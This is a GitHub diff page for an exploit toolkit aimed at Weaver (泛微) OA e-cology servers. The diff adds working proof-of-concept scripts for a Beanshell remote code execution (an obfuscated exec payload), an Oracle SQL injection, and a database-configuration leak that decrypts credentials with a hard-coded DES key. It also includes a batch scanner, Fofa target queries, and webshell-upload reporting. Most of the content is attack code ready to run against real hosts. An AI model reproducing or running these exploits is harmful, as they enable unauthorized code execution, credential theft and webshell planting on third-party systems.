Skip to content
Permalink

Comparing changes

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also or learn more about diff comparisons.

Open a pull request

Create a new pull request by comparing changes across two branches. If you need to, you can also . Learn more about diff comparisons here.
base repository: haotiku/weaver_exp
Failed to load repositories. Confirm that selected base ref is valid, then try again.
Loading
base: master
Choose a base ref
...
head repository: QKioi/weaver_exp
Failed to load repositories. Confirm that selected head ref is valid, then try again.
Loading
compare: master
Choose a head ref
Able to merge. These branches can be automatically merged.
  • 6 commits
  • 10 files changed
  • 1 contributor

Commits on Jun 28, 2021

  1. Add Bsh_RCE.py

    z1un committed Jun 28, 2021
    Copy the full SHA
    cd36f04 View commit details

  2. Fix some bugs

    z1un committed Jun 28, 2021
    Copy the full SHA
    8a85bbe View commit details

  3. Add WorkflowCenterTreeData_Sql

    z1un committed Jun 28, 2021
    Copy the full SHA
    c28a811 View commit details

  4. Add E_Cology_Database_Leak

    z1un committed Jun 28, 2021
    Copy the full SHA
    a3f5f60 View commit details

  5. Fix Bugs

    z1un committed Jun 28, 2021
    Copy the full SHA
    c158ca1 View commit details

  6. Fix Bugs

    z1un committed Jun 28, 2021
    Copy the full SHA
    ff34c94 View commit details
24 changes: 18 additions & 6 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -7,31 +7,38 @@
泛微OA V8前台Sql注入
泛微OA WorkflowServiceXml RCE
泛微OA WorkflowServiceXml RCE CNVD-2019-32204
泛微OA weaver.common.Ctrl 任意文件上传
泛微OA Bsh RCE
泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
泛微OA E-Cology 数据库配置信息泄漏
```
泛微OA V9 任意文件上传(未完成,测试ing)

先写了这些,也欢迎补充~

其中`/poc`下的利用脚本均可独立使用。

##### Usage:
```bash
python3 poc.py url
```

##### Usage:

```bash
python3 main.py -f filename

python3 main.py -u url
```



![](https://zjun-info.oss-cn-chengdu.aliyuncs.com/zjun.info/image-20210628010147963.png)

![](https://zjun-info.oss-cn-chengdu.aliyuncs.com/zjun.info/image-20210628010645469.png)



## 参考

https://ailiqun.xyz/2021/05/02/%E6%B3%9B%E5%BE%AEOA-%E5%89%8D%E5%8F%B0GetShell%E5%A4%8D%E7%8E%B0/
@@ -40,3 +47,8 @@ http://wiki.peiqi.tech/

https://www.o2oxy.cn/3561.html

https://github.com/Henry4E36/weaverSQL

https://github.com/NS-Sp4ce/Weaver-OA-E-cology-Database-Leak


29 changes: 25 additions & 4 deletions main.py
View file
Original file line number Diff line number Diff line change
@@ -4,8 +4,11 @@
import argparse
import time
from pyfiglet import Figlet
# from multiprocessing import Pool

from poc import E_Bridge_Arbitrary_File_Read, E_Cology_WorkflowServiceXml_RCE, E_Cology_V8_Sql,Weaver_Common_Ctrl_Upload

from poc import E_Bridge_Arbitrary_File_Read, E_Cology_WorkflowServiceXml_RCE, E_Cology_V8_Sql, \
Weaver_Common_Ctrl_Upload, Bsh_RCE, WorkflowCenterTreeData_Sql, E_Cology_Database_Leak

BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
@@ -78,6 +81,20 @@ def check(url):
if Weaver_Common_Ctrl_Upload.GetShell(url) == 'ok':
result('泛微OA weaver.common.Ctrl 任意文件上传', url)

# 泛微Bsh RCE
print(now_time() + info() + '正在检测泛微OA Bsh RCE漏洞')
if Bsh_RCE.Check(url) == 'ok':
result('泛微OA Bsh RCE', url)

# 泛微OA WorkflowCenterTreeData接口SQL注入
print(now_time() + info() + '正在检测泛微OA WorkflowCenterTreeData接口SQL注入漏洞')
if WorkflowCenterTreeData_Sql.exploit(url) == 'ok':
result('泛微OA WorkflowCenterTreeData接口SQL注入', url)

# 泛微OA e-cology 数据库配置信息泄漏
print(now_time() + info() + '正在检测泛微OA e-cology 数据库配置信息泄漏漏洞')
if E_Cology_Database_Leak.checkVulUrl(url) == 'ok':
result('泛微OA 数据库配置信息泄漏漏洞', url)


if __name__ == '__main__':
@@ -90,6 +107,7 @@ def check(url):
os.path.basename(__file__))
args = parser.parse_args()
if args.file:
# pool = Pool(processes=10)
f = open(args.file, 'r')
urls = f.readlines()
for url in urls:
@@ -98,15 +116,18 @@ def check(url):
url += '/'
if url[:4] != 'http':
url = 'http://' + url
# pool.apply_async(check, args=(url,))
check(url)
# 扫描结果
print(now_time() + info() + '扫描已完成, 结果保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')
f.close()
# pool.close()
# pool.join()
# 扫描结果
print(now_time() + info() + '扫描已完成, 若有漏洞将保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')

elif args.url:
check(args.url)
# 扫描结果
print(now_time() + info() + '扫描已完成, 结果保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')
print(now_time() + info() + '扫描已完成, 若有漏洞将保存至 \'' + os.path.dirname(os.path.abspath(__file__)) + '/result.txt\'')

else:
print(Usage)
69 changes: 69 additions & 0 deletions poc/Bsh_RCE.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,69 @@
# -*- coding: utf-8 -*-
# 泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204
# Fofa: app="泛微-协同办公OA"

import requests
import sys
import time

BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
YELLOW = '\033[33m'
VIOLET = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'


def now_time():
return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC


def info():
return VIOLET + "[INFO] " + ENDC


def error():
return RED + "[ERROR] " + ENDC


def success():
return GREEN + "[SUCCESS] " + ENDC


def warning():
return YELLOW + "[WARNING] " + ENDC


headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Content-Type': 'application/x-www-form-urlencoded',
}


def Check(target):
target += "weaver/bsh.servlet.BshServlet"
payload = """bsh.script=\\u0065\\u0078\\u0065\\u0063("whoami");&bsh.servlet.output=raw"""
try:
requests.packages.urllib3.disable_warnings()
request = requests.post(headers=headers, url=target, data=payload, timeout=5, verify=False)
if ";</script>" not in request.text:
if "Login.jsp" not in request.text:
if "Error" not in request.text:
if "<head>" not in request.text:
print(now_time() + info() + '存在Beanshell RCE漏洞: {}'.format(target))
print(now_time()+info()+'可Post手动传值测试: {}'.format(payload))
print(now_time() + success() + 'whoami: {}'.format(request.text.strip('\n')))
return 'ok'
else:
print(now_time()+warning()+"不存在Beanshell RCE漏洞")
except:

print(now_time() + error() + '未知错误')


if __name__ == '__main__':
url = sys.argv[1]
if url[-1] != '/':
url += '/'
Check(url)
84 changes: 84 additions & 0 deletions poc/E_Cology_Database_Leak.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,84 @@
# -*- coding: utf-8 -*-
# 泛微OA E-Cology 数据库配置信息泄漏
# Fofa: app="泛微-协同办公OA"

import pyDes
import requests
import sys
import time

BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
YELLOW = '\033[33m'
VIOLET = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'


def now_time():
return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC


def info():
return VIOLET + "[INFO] " + ENDC


def error():
return RED + "[ERROR] " + ENDC


def success():
return GREEN + "[SUCCESS] " + ENDC


def warning():
return YELLOW + "[WARNING] " + ENDC


headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25'
}


def desdecode(secret_key, s):
cipherX = pyDes.des(' ')
cipherX.setKey(secret_key)
y = cipherX.decrypt(s)
return y


def checkVulUrl(url):
url += 'mobile/DBconfigReader.jsp'
try:
requests.packages.urllib3.disable_warnings()
res = requests.get(url=url, headers=headers, timeout=10, verify=False)
if res.status_code != 200:
print(now_time() + warning() + '不存在泛微OA E-Cology 数据库配置信息泄漏漏洞')
elif res.status_code == 200:
print(now_time() + info() + '可能存在泛微OA E-Cology 数据库配置信息泄漏漏洞')
res = res.content
try:
data = desdecode('1z2x3c4v5b6n', res.strip())
data = data.strip()
dbType = str(data).split(';')[0].split(':')[1]
dbUrl = str(data).split(';')[0].split(':')[2].split('//')[1]
dbPort = str(data).split(';')[0].split(':')[3]
dbName = str(data).split(';')[1].split(',')[0].split('=')[1]
dbUser = str(data).split(';')[1].split(',')[1].split('=')[1]
dbPass = str(data).split(';')[1].split(',')[2].split('=')[1]
print(now_time() + success() + url +
"\n DBType: {0}\n DBUrl: {1}\n DBPort: {2}\n DBName: {3}\n DBUser: {4}\n DBPass: {5}".format(
dbType, dbUrl, dbPort, dbName, dbUser, dbPass))
return 'ok'
except:
print(now_time() + warning() + 'DES解密失败, 可能默认密钥错误, 手动访问进行确认: {}'.format(url))
except:
print(now_time() + error() + '无法连接到目标')


if __name__ == '__main__':
url = sys.argv[1]
if url[-1] != '/':
url += '/'
checkVulUrl(url)
4 changes: 3 additions & 1 deletion poc/Weaver_Common_Ctrl_Upload.py
View file
Original file line number Diff line number Diff line change
@@ -79,14 +79,16 @@ def GetShell(urllist):
print(now_time() + success() + '利用成功webshell地址为: ' + GetShellurl+'?cmd=')
return 'ok'
else:
print(now_time() + error() + '未找到webshell, 利用失败, 可换马重试')
print(now_time() + warning() + '未找到webshell, 利用失败, 可换马重试')
except:
print(now_time() + error() + '未知错误')


def main():
if (len(sys.argv) == 2):
url = sys.argv[1]
if url[-1] != '/':
url += '/'
GetShell(url)
else:
print("python3 {} http://xx.xx.xx.xx".format(sys.argv[0]))
66 changes: 66 additions & 0 deletions poc/WorkflowCenterTreeData_Sql.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,66 @@
# -*- coding: utf-8 -*-
# 泛微OA WorkflowCenterTreeData接口SQL注入(仅限oracle数据库) CNVD-2019-34241
# Fofa: app="泛微-协同办公OA"

import requests
import sys
import time

BLUE = '\033[0;36m'
RED = '\x1b[1;91m'
YELLOW = '\033[33m'
VIOLET = '\033[1;94m'
GREEN = '\033[1;32m'
BOLD = '\033[1m'
ENDC = '\033[0m'


def now_time():
return BLUE + time.strftime("[%H:%M:%S] ", time.localtime()) + ENDC


def info():
return VIOLET + "[INFO] " + ENDC


def error():
return RED + "[ERROR] " + ENDC


def success():
return GREEN + "[SUCCESS] " + ENDC


def warning():
return YELLOW + "[WARNING] " + ENDC


headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded'
}


def exploit(url):
target = url + 'mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333'
payload = "formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1"
try:
requests.packages.urllib3.disable_warnings()
res = requests.post(url=target, data=payload, headers=headers, verify=False, timeout=10)
res.encoding = res.apparent_encoding
if '[' in res.text:
print(now_time() + success() + '目标为oracle数据库, 可利用sqlmap进行进一步利用: {}'.format(target))
return 'ok'
else:
print(now_time() + warning() + '不存在泛微OA WorkflowCenterTreeData接口SQL注入')
except:
print(now_time() + error() + '未知错误')


if __name__ == '__main__':
url = sys.argv[1]
if url[-1] != '/':
url += '/'
exploit(url)
Binary file removed poc/__pycache__/E_Bridge_Arbitrary_File_Read.cpython-39.pyc
View file
Binary file not shown.
Binary file removed poc/__pycache__/E_Cology_V8_Sql.cpython-39.pyc
View file
Binary file not shown.
Binary file removed poc/__pycache__/E_Cology_WorkflowServiceXml_RCE.cpython-39.pyc
View file
Binary file not shown.
Binary file removed poc/__pycache__/Weaver_Common_Ctrl_Upload.cpython-39.pyc
View file
Binary file not shown.